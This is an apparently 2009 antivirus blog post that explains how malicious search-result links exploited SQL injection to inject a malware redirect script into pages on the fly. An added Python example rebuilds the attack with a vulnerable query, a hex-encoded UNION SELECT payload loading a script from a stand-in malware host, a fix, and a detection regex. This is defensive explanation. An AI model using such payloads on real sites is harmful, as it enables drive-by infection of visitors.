
June 18th, 2009

Google – new malware hosting

A new kind of malware was found today that uses the Google search index as its hosting. Werner Klier (virus researcher at GData) pointed us to one very puzzling Google search result. avast! detected this result as malware from the beginning. It is nonetheless an interesting approach by the malware authors: using Google to host their malware. Here I describe how the infection works (GData virus researchers Ralf Benzmüller and Armin Büscher reached the same conclusion).

The next picture shows the Google result as displayed in the web browser. Details have been removed from the image; only a small part of the text is left readable, to show the beginning of the malicious link.

[image: google_malformed_url]

The whole link is shown in the next image. The important part of the link is everything after the string “?ID=”: it is a SQL fragment that the targeted PHP page executes. The only condition for the SQL to run is a bug in the target page that allows so-called ‘SQL injection’, i.e. the value of the ID parameter is pasted unescaped into the query. The rest of the injected SQL carries encoded HTML, which the query returns and the page writes into the generated document. The PHP code on the server contains no malicious script; the malicious code is injected through the link from Google at the moment a user clicks on it. This is the previously unseen approach I mentioned at the beginning of this article.

[image: google_malformed_url2]

The next picture shows the HTML just after injection. Nothing is stored on the server, and the server’s version of the document is still clean. The injected code contains some keywords and a link to a malware distribution server, everything needed to redirect and infect the visiting computer.

[image: google_injected_code]

The last decoded string in the previous image is the HTML tag that loads the redirection script from the malware distribution server. If the browser loads it, the infection begins.
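The mechanism described in the three preceding paragraphs, as an added example that is not code from the original post or from any of the sites involved: a constructed sqlite3-backed page that pastes the ID parameter straight into its query, a hex-encoded UNION SELECT payload that makes that page emit attacker-supplied HTML on the fly, the parameterized fix, and a small check for links of this shape. The host names, table and column names, redirect script URL and the detection heuristic are all assumptions. The original attack targeted PHP with a MySQL-style 0x... literal; SQLite needs CAST(X'...' AS TEXT) to turn the hex blob back into text, so that form is used here.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample site (an assumption, not the site from the post): one table of
# articles served by a page that takes ?ID=<number> and prints the matching body.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT)")
    db.execute("INSERT INTO articles VALUES (1, '<p>Clean server copy</p>')")
    db.commit()
    return db

def render_vulnerable(db, id_param):
    # The bug the attack relies on: the raw ID value is pasted into the SQL text,
    # so whatever follows "?ID=" becomes part of the query.
    rows = db.execute("SELECT body FROM articles WHERE id=" + id_param).fetchall()
    return "".join(r[0] for r in rows)

def render_fixed(db, id_param):
    # Hardened form: validate the type, then bind the value as a parameter.
    if not id_param.isdigit():
        return ""
    rows = db.execute("SELECT body FROM articles WHERE id=?", (int(id_param),)).fetchall()
    return "".join(r[0] for r in rows)

# Assumed attacker HTML: a redirect script pulled from a distribution server.
INJECTED_HTML = '<script src="http://malware.example/redirect.js"></script>'
# Hex-encoding keeps the HTML out of the visible URL and needs no quotes in the query.
# SQLite's X'..' is a blob, so CAST it to TEXT; MySQL accepts 0x.. as a string directly.
HEX_PAYLOAD = INJECTED_HTML.encode().hex()
MALICIOUS_QUERY = f"1 AND 1=2 UNION SELECT CAST(X'{HEX_PAYLOAD}' AS TEXT)"
MALICIOUS_URL = "http://victim.example/page.php?ID=" + urllib.parse.quote(MALICIOUS_QUERY)

def id_from_url(url):
    # What the PHP page would read from $_GET['ID'] after URL decoding.
    query = urllib.parse.urlparse(url).query
    return urllib.parse.parse_qs(query)["ID"][0]

# Check for links of this shape in a crawl or a proxy log: a UNION SELECT or a long
# hex literal inside a query string is a strong signal. (Constructed heuristic.)
SQLI_HEX_RE = re.compile(r"union\s+(all\s+)?select|0x[0-9a-f]{8,}|x'[0-9a-f]{8,}'", re.I)

def looks_like_injected_link(url):
    return bool(SQLI_HEX_RE.search(urllib.parse.unquote_plus(url)))

def demo():
    db = make_db()
    id_param = id_from_url(MALICIOUS_URL)
    return {
        # Buggy page: the attacker's HTML comes back as if it were article content.
        "vulnerable": render_vulnerable(db, id_param),
        # Fixed page: the non-numeric ID is rejected and nothing is rendered.
        "fixed": render_fixed(db, id_param),
        # The stored row is untouched: the injection is reflected, not stored.
        "stored": db.execute("SELECT body FROM articles WHERE id=1").fetchone()[0],
        "flagged": looks_like_injected_link(MALICIOUS_URL),
        "benign_flagged": looks_like_injected_link("http://victim.example/page.php?ID=1"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the block prints the injected script tag for the vulnerable page, an empty body for the fixed page, and the unchanged stored row, which is exactly why scanning the server’s files finds nothing: the malicious HTML exists only in the query string of the link and in the response generated from it.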

Behavior:

  • Uses the most widely used search engine to host itself: the malware is actually stored as a link to a buggy website that allows SQL injection.
  • The buggy website itself is not modified on the server; the page is altered on the fly when a user clicks on the link from Google.
  • It is a new approach to storing malware on the internet: using a search engine’s database.
  • Currently all the malicious URLs have been removed from the Google database.
  • (Updated 18.6.2009, evening) Microsoft’s Bing is affected too and still offers the malicious links.
  1. lorijryan
    June 22nd, 2009 at 22:38 | #1

    Thanks for the article….was directed to it via a link in the Avast! forum.

    The mechanism of how this infection works is beyond my understanding, but glad to see Avast! seems to once again be spot-on in its detection!
